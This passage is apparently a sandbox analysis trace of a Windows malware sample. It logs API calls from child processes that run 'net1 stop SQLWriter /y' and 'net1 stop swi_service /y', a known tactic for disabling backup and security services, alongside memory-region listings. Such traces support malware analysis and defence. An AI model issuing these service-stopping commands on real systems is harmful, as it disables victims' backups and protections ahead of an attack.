0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11450 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11451 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11453 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 836 os_tid = 0xcc4 [0115.791] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1aff10 | out: lpSystemTimeAsFileTime=0x1aff10*(dwLowDateTime=0xfa287d10, dwHighDateTime=0x1d48689)) [0115.791] GetCurrentProcessId () returned 0xd84 [0115.791] GetCurrentThreadId () returned 0xcc4 [0115.791] GetTickCount () returned 0x26a08 [0115.791] QueryPerformanceCounter (in: lpPerformanceCount=0x1aff18 | out: lpPerformanceCount=0x1aff18*=1816270900000) returned 1 [0115.792] GetModuleHandleW (lpModuleName=0x0) returned 0xff380000 [0115.792] __set_app_type (_Type=0x1) [0115.792] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff399c9c) returned 0x0 [0115.792] __getmainargs (in: _Argc=0xff3a4780, _Argv=0xff3a4790, _Env=0xff3a4788, _DoWildCard=0, _StartInfo=0xff3a479c | out: _Argc=0xff3a4780, _Argv=0xff3a4790, _Env=0xff3a4788) returned 0 [0115.792] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0115.792] GetConsoleOutputCP () returned 0x1b5 [0115.793] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3acec0 | out: lpCPInfo=0xff3acec0) returned 1 [0115.793] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0115.795] sprintf_s (in: _DstBuf=0x1afeb8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0115.795] setlocale (category=0, locale=".437") returned="English_United States.437" [0115.796] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.797] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0115.797] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLWriter /y" [0115.797] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1afc50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0115.797] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0115.797] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afea8 | out: Buffer=0x1afea8*=0x324d50) returned 0x0 [0115.797] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afea8 | out: Buffer=0x1afea8*=0x32c0f0) returned 0x0 [0115.797] _fileno (_File=0x7fefdba2a80) returned 0 [0115.797] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0115.797] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0115.797] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0115.797] _wcsicmp (_String1="config", _String2="stop") returned -16 [0115.797] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0115.797] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0115.797] _wcsicmp (_String1="file", _String2="stop") returned -13 [0115.797] _wcsicmp (_String1="files", _String2="stop") returned -13 [0115.798] _wcsicmp (_String1="group", _String2="stop") returned -12 [0115.798] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0115.798] _wcsicmp (_String1="help", _String2="stop") returned -11 [0115.798] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0115.798] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0115.798] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0115.798] _wcsicmp (_String1="session", _String2="stop") returned -15 [0115.798] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0115.798] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0115.798] _wcsicmp (_String1="share", _String2="stop") returned -12 [0115.798] _wcsicmp (_String1="start", _String2="stop") returned -14 [0115.798] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0115.798] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0115.798] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0115.798] _wcsicmp (_String1="accounts", _String2="SQLWriter") returned -18 [0115.798] _wcsicmp (_String1="computer", _String2="SQLWriter") returned -16 [0115.798] _wcsicmp (_String1="config", _String2="SQLWriter") returned -16 [0115.798] _wcsicmp (_String1="continue", _String2="SQLWriter") returned -16 [0115.798] _wcsicmp (_String1="cont", _String2="SQLWriter") returned -16 [0115.798] _wcsicmp (_String1="file", _String2="SQLWriter") returned -13 [0115.798] _wcsicmp (_String1="files", _String2="SQLWriter") returned -13 [0115.798] _wcsicmp (_String1="group", _String2="SQLWriter") returned -12 [0115.798] _wcsicmp (_String1="groups", _String2="SQLWriter") returned -12 [0115.798] _wcsicmp (_String1="help", _String2="SQLWriter") returned -11 [0115.798] _wcsicmp (_String1="helpmsg", _String2="SQLWriter") returned -11 [0115.798] _wcsicmp (_String1="localgroup", _String2="SQLWriter") returned -7 [0115.798] _wcsicmp (_String1="pause", _String2="SQLWriter") returned -3 [0115.798] _wcsicmp (_String1="session", _String2="SQLWriter") returned -12 [0115.798] _wcsicmp (_String1="sessions", _String2="SQLWriter") returned -12 [0115.798] _wcsicmp (_String1="sess", _String2="SQLWriter") returned -12 [0115.798] _wcsicmp (_String1="share", _String2="SQLWriter") returned -9 [0115.798] _wcsicmp (_String1="start", _String2="SQLWriter") returned 3 [0115.798] _wcsicmp (_String1="stats", _String2="SQLWriter") returned 3 [0115.798] _wcsicmp (_String1="statistics", _String2="SQLWriter") returned 3 [0115.798] _wcsicmp (_String1="stop", _String2="SQLWriter") returned 3 [0115.799] _wcsicmp (_String1="time", _String2="SQLWriter") returned 1 [0115.799] _wcsicmp (_String1="user", _String2="SQLWriter") returned 2 [0115.799] _wcsicmp (_String1="users", _String2="SQLWriter") returned 2 [0115.799] _wcsicmp (_String1="msg", _String2="SQLWriter") returned -6 [0115.799] _wcsicmp (_String1="messenger", _String2="SQLWriter") returned -6 [0115.799] _wcsicmp (_String1="receiver", _String2="SQLWriter") returned -1 [0115.799] _wcsicmp (_String1="rcv", _String2="SQLWriter") returned -1 [0115.799] _wcsicmp (_String1="netpopup", _String2="SQLWriter") returned -5 [0115.799] _wcsicmp (_String1="redirector", _String2="SQLWriter") returned -1 [0115.799] _wcsicmp (_String1="redir", _String2="SQLWriter") returned -1 [0115.799] _wcsicmp (_String1="rdr", _String2="SQLWriter") returned -1 [0115.799] _wcsicmp (_String1="workstation", _String2="SQLWriter") returned 4 [0115.799] _wcsicmp (_String1="work", _String2="SQLWriter") returned 4 [0115.799] _wcsicmp (_String1="wksta", _String2="SQLWriter") returned 4 [0115.799] _wcsicmp (_String1="prdr", _String2="SQLWriter") returned -3 [0115.799] _wcsicmp (_String1="devrdr", _String2="SQLWriter") returned -15 [0115.799] _wcsicmp (_String1="lanmanworkstation", _String2="SQLWriter") returned -7 [0115.799] _wcsicmp (_String1="server", _String2="SQLWriter") returned -12 [0115.837] _wcsicmp (_String1="svr", _String2="SQLWriter") returned 5 [0115.837] _wcsicmp (_String1="srv", _String2="SQLWriter") returned 1 [0115.837] _wcsicmp (_String1="lanmanserver", _String2="SQLWriter") returned -7 [0115.837] _wcsicmp (_String1="alerter", _String2="SQLWriter") returned -18 [0115.837] _wcsicmp (_String1="netlogon", _String2="SQLWriter") returned -5 [0115.837] _wcsupr (in: _String="SQLWriter" | out: _String="SQLWRITER") returned="SQLWRITER" [0115.837] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x32ce00 [0115.842] GetServiceKeyNameW (in: hSCManager=0x32ce00, lpDisplayName="SQLWRITER", lpServiceName=0xff3a5750, lpcchBuffer=0x1afdc8 | out: lpServiceName="", lpcchBuffer=0x1afdc8) returned 0 [0115.843] _wcsicmp (_String1="msg", _String2="SQLWRITER") returned -6 [0115.843] _wcsicmp (_String1="messenger", _String2="SQLWRITER") returned -6 [0115.843] _wcsicmp (_String1="receiver", _String2="SQLWRITER") returned -1 [0115.843] _wcsicmp (_String1="rcv", _String2="SQLWRITER") returned -1 [0115.843] _wcsicmp (_String1="redirector", _String2="SQLWRITER") returned -1 [0115.843] _wcsicmp (_String1="redir", _String2="SQLWRITER") returned -1 [0115.843] _wcsicmp (_String1="rdr", _String2="SQLWRITER") returned -1 [0115.843] _wcsicmp (_String1="workstation", _String2="SQLWRITER") returned 4 [0115.843] _wcsicmp (_String1="work", _String2="SQLWRITER") returned 4 [0115.843] _wcsicmp (_String1="wksta", _String2="SQLWRITER") returned 4 [0115.843] _wcsicmp (_String1="prdr", _String2="SQLWRITER") returned -3 [0115.843] _wcsicmp (_String1="devrdr", _String2="SQLWRITER") returned -15 [0115.843] _wcsicmp (_String1="lanmanworkstation", _String2="SQLWRITER") returned -7 [0115.843] _wcsicmp (_String1="server", _String2="SQLWRITER") returned -12 [0115.843] _wcsicmp (_String1="svr", _String2="SQLWRITER") returned 5 [0115.843] _wcsicmp (_String1="srv", _String2="SQLWRITER") returned 1 [0115.843] _wcsicmp (_String1="lanmanserver", _String2="SQLWRITER") returned -7 [0115.843] _wcsicmp (_String1="alerter", _String2="SQLWRITER") returned -18 [0115.843] _wcsicmp (_String1="netlogon", _String2="SQLWRITER") returned -5 [0115.844] NetServiceControl (in: servername=0x0, service="SQLWRITER", opcode=0x0, arg=0x0, bufptr=0x1afdd0 | out: bufptr=0x1afdd0) returned 0x889 [0115.844] wcscpy_s (in: _Destination=0xff3a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0115.845] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0115.846] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3a5b50, nSize=0x800, Arguments=0xff3a7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0115.848] GetFileType (hFile=0xb) returned 0x2 [0115.848] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afc98 | out: lpMode=0x1afc98) returned 1 [0115.848] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3a5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1afc90, lpReserved=0x0 | out: lpBuffer=0xff3a5b50*, lpNumberOfCharsWritten=0x1afc90*=0x1e) returned 1 [0115.849] GetFileType (hFile=0xb) returned 0x2 [0115.849] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afc98 | out: lpMode=0x1afc98) returned 1 [0115.849] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff381efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1afc90, lpReserved=0x0 | out: lpBuffer=0xff381efc*, lpNumberOfCharsWritten=0x1afc90*=0x2) returned 1 [0115.850] _ultow (in: _Dest=0x889, _Radix=1768704 | out: _Dest=0x889) returned="2185" [0115.850] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3a5b50, nSize=0x800, Arguments=0xff3a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0115.850] GetFileType (hFile=0xb) returned 0x2 [0115.850] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afc98 | out: lpMode=0x1afc98) returned 1 [0115.850] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1afc90, lpReserved=0x0 | out: lpBuffer=0xff3a5b50*, lpNumberOfCharsWritten=0x1afc90*=0x34) returned 1 [0115.851] GetFileType (hFile=0xb) returned 0x2 [0115.851] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afc98 | out: lpMode=0x1afc98) returned 1 [0115.851] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff381efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1afc90, lpReserved=0x0 | out: lpBuffer=0xff381efc*, lpNumberOfCharsWritten=0x1afc90*=0x2) returned 1 [0115.852] NetApiBufferFree (Buffer=0x324d50) returned 0x0 [0115.852] NetApiBufferFree (Buffer=0x32c0f0) returned 0x0 [0115.852] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLWriter /y" [0115.852] exit (_Code=2) Process: id = "320" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x4f5d3000" os_pid = "0x918" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "312" os_parent_pid = "0x578" cmd_line = "C:\\Windows\\system32\\net1 stop swi_service /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11361 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11362 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11363 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11364 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 11365 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11366 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11367 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11368 start_va = 0xff380000 end_va = 0xff3b2fff entry_point = 0xff380000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11369 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11370 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11371 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 11372 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11400 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11401 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11402 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11403 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 11404 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 11405 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 11406 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11407 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11408 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11409 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11410 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11411 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11412 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11413 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11414 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11415 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11416 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11417 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11418 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11419 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11420 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11421 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11422 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11423 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11424 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11425 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11452 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 837 os_tid = 0xbf0 [0115.746] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fd30 | out: lpSystemTimeAsFileTime=0x22fd30*(dwLowDateTime=0xfa2158f0, dwHighDateTime=0x1d48689)) [0115.746] GetCurrentProcessId () returned 0x918 [0115.747] GetCurrentThreadId () returned 0xbf0 [0115.747] GetTickCount () returned 0x269d9 [0115.747] QueryPerformanceCounter (in: lpPerformanceCount=0x22fd38 | out: lpPerformanceCount=0x22fd38*=1816266500000) returned 1 [0115.747] GetModuleHandleW (lpModuleName=0x0) returned 0xff380000 [0115.747] __set_app_type (_Type=0x1) [0115.747] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff399c9c) returned 0x0 [0115.747] __getmainargs (in: _Argc=0xff3a4780, _Argv=0xff3a4790, _Env=0xff3a4788, _DoWildCard=0, _StartInfo=0xff3a479c | out: _Argc=0xff3a4780, _Argv=0xff3a4790, _Env=0xff3a4788) returned 0 [0115.748] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0115.748] GetConsoleOutputCP () returned 0x1b5 [0115.748] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3acec0 | out: lpCPInfo=0xff3acec0) returned 1 [0115.748] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0115.750] sprintf_s (in: _DstBuf=0x22fcd8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0115.751] setlocale (category=0, locale=".437") returned="English_United States.437" [0115.752] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.752] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0115.752] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_service /y" [0115.752] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x22fa70, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0115.753] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0115.753] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x22fcc8 | out: Buffer=0x22fcc8*=0x394d50) returned 0x0 [0115.753] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x22fcc8 | out: Buffer=0x22fcc8*=0x39c100) returned 0x0 [0115.753] _fileno (_File=0x7fefdba2a80) returned 0 [0115.753] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0115.753] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0115.753] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0115.753] _wcsicmp (_String1="config", _String2="stop") returned -16 [0115.753] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0115.754] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0115.754] _wcsicmp (_String1="file", _String2="stop") returned -13 [0115.754] _wcsicmp (_String1="files", _String2="stop") returned -13 [0115.754] _wcsicmp (_String1="group", _String2="stop") returned -12 [0115.754] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0115.754] _wcsicmp (_String1="help", _String2="stop") returned -11 [0115.754] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0115.754] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0115.754] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0115.754] _wcsicmp (_String1="session", _String2="stop") returned -15 [0115.754] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0115.754] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0115.754] _wcsicmp (_String1="share", _String2="stop") returned -12 [0115.754] _wcsicmp (_String1="start", _String2="stop") returned -14 [0115.754] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0115.754] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0115.754] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0115.754] _wcsicmp (_String1="accounts", _String2="swi_service") returned -18 [0115.755] _wcsicmp (_String1="computer", _String2="swi_service") returned -16 [0115.755] _wcsicmp (_String1="config", _String2="swi_service") returned -16 [0115.755] _wcsicmp (_String1="continue", _String2="swi_service") returned -16 [0115.755] _wcsicmp (_String1="cont", _String2="swi_service") returned -16 [0115.755] _wcsicmp (_String1="file", _String2="swi_service") returned -13 [0115.755] _wcsicmp (_String1="files", _String2="swi_service") returned -13 [0115.755] _wcsicmp (_String1="group", _String2="swi_service") returned -12 [0115.755] _wcsicmp (_String1="groups", _String2="swi_service") returned -12 [0115.755] _wcsicmp (_String1="help", _String2="swi_service") returned -11 [0115.755] _wcsicmp (_String1="helpmsg", _String2="swi_service") returned -11 [0115.755] _wcsicmp (_String1="localgroup", _String2="swi_service") returned -7 [0115.755] _wcsicmp (_String1="pause", _String2="swi_service") returned -3 [0115.755] _wcsicmp (_String1="session", _String2="swi_service") returned -18 [0115.755] _wcsicmp (_String1="sessions", _String2="swi_service") returned -18 [0115.755] _wcsicmp (_String1="sess", _String2="swi_service") returned -18 [0115.755] _wcsicmp (_String1="share", _String2="swi_service") returned -15 [0115.755] _wcsicmp (_String1="start", _String2="swi_service") returned -3 [0115.755] _wcsicmp (_String1="stats", _String2="swi_service") returned -3 [0115.755] _wcsicmp (_String1="statistics", _String2="swi_service") returned -3 [0115.755] _wcsicmp (_String1="stop", _String2="swi_service") returned -3 [0115.756] _wcsicmp (_String1="time", _String2="swi_service") returned 1 [0115.756] _wcsicmp (_String1="user", _String2="swi_service") returned 2 [0115.756] _wcsicmp (_String1="users", _String2="swi_service") returned 2 [0115.756] _wcsicmp (_String1="msg", _String2="swi_service") returned -6 [0115.756] _wcsicmp (_String1="messenger", _String2="swi_service") returned -6 [0115.756] _wcsicmp (_String1="receiver", _String2="swi_service") returned -1 [0115.756] _wcsicmp (_String1="rcv", _String2="swi_service") returned -1 [0115.756] _wcsicmp (_String1="netpopup", _String2="swi_service") returned -5 [0115.756] _wcsicmp (_String1="redirector", _String2="swi_service") returned -1 [0115.756] _wcsicmp (_String1="redir", _String2="swi_service") returned -1 [0115.756] _wcsicmp (_String1="rdr", _String2="swi_service") returned -1 [0115.756] _wcsicmp (_String1="workstation", _String2="swi_service") returned 4 [0115.756] _wcsicmp (_String1="work", _String2="swi_service") returned 4 [0115.756] _wcsicmp (_String1="wksta", _String2="swi_service") returned 4 [0115.756] _wcsicmp (_String1="prdr", _String2="swi_service") returned -3 [0115.756] _wcsicmp (_String1="devrdr", _String2="swi_service") returned -15 [0115.756] _wcsicmp (_String1="lanmanworkstation", _String2="swi_service") returned -7 [0115.756] _wcsicmp (_String1="server", _String2="swi_service") returned -18 [0115.757] _wcsicmp (_String1="svr", _String2="swi_service") returned -1 [0115.757] _wcsicmp (_String1="srv", _String2="swi_service") returned -5 [0115.757] _wcsicmp (_String1="lanmanserver", _String2="swi_service") returned -7 [0115.757] _wcsicmp (_String1="alerter", _String2="swi_service") returned -18 [0115.757] _wcsicmp (_String1="netlogon", _String2="swi_service") returned -5 [0115.757] _wcsupr (in: _String="swi_service" | out: _String="SWI_SERVICE") returned="SWI_SERVICE" [0115.757] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x39ce10 [0115.809] GetServiceKeyNameW (in: hSCManager=0x39ce10, lpDisplayName="SWI_SERVICE", lpServiceName=0xff3a5750, lpcchBuffer=0x22fbe8 | out: lpServiceName="", lpcchBuffer=0x22fbe8) returned 0 [0115.810] _wcsicmp (_String1="msg", _String2="SWI_SERVICE") returned -6 [0115.810] _wcsicmp (_String1="messenger", _String2="SWI_SERVICE") returned -6 [0115.810] _wcsicmp (_String1="receiver", _String2="SWI_SERVICE") returned -1 [0115.810] _wcsicmp (_String1="rcv", _String2="SWI_SERVICE") returned -1 [0115.810] _wcsicmp (_String1="redirector", _String2="SWI_SERVICE") returned -1 [0115.810] _wcsicmp (_String1="redir", _String2="SWI_SERVICE") returned -1 [0115.811] _wcsicmp 